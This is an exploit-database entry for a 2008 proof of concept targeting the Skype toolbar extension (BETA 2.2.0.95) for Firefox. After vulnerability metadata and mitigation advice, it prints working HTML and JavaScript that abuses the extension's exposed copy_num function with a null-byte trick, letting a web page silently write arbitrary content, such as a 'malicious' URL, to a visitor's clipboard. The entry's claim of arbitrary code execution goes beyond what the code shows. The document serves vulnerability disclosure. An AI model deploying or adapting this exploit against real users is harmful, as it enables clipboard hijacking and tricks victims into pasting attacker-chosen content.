Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC

vendor:

Skype Toolbars

by:

irk4z

7.5

CVSS

HIGH

Clipboard Writing Vulnerability

284

CWE

Product Name: Skype Toolbars

Affected Version From: 2.2.0.95

Affected Version To: 2.2.0.95

Patch Exists: Yes

Related CWE: N/A

CPE: a:skype:skype_toolbars

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Firefox

2008

Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC

A vulnerability in Skype extension for Firefox BETA 2.2.0.95 allows an attacker to write malicious content to the clipboard of the victim. This can be exploited by an attacker to execute arbitrary code on the victim's system by tricking the victim into pasting the malicious content into a vulnerable application.

Mitigation:

Update to the latest version of Skype extension for Firefox BETA.

Source

Exploit-DB raw data:

<!---------------------------------------------------------------------------
 Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC
 download: https://developer.skype.com/SkypeToolbars
 
 Author: irk4z[at]yahoo.pl
 homepage: http://irk4z.wordpress.com/
 
 greets: all friends 
---------------------------------------------------------------------------->
<a href="#" onclick="check_it();" >test it!</a>


<script type="text/javascript">

function copy_to_clipboard( text ){
	if (skype_tool) {
		var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string
		skype_tool.copy_num( copy_it );
	}
}

function check_it(){
	//copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!');
	//copy_to_clipboard('http://irk4z.wordpress.com/');
	copy_to_clipboard('http://malicious.link.to.bad.page/');
	alert('Done! Check your clipboard!');
}

</script>

# milw0rm.com [2008-10-07]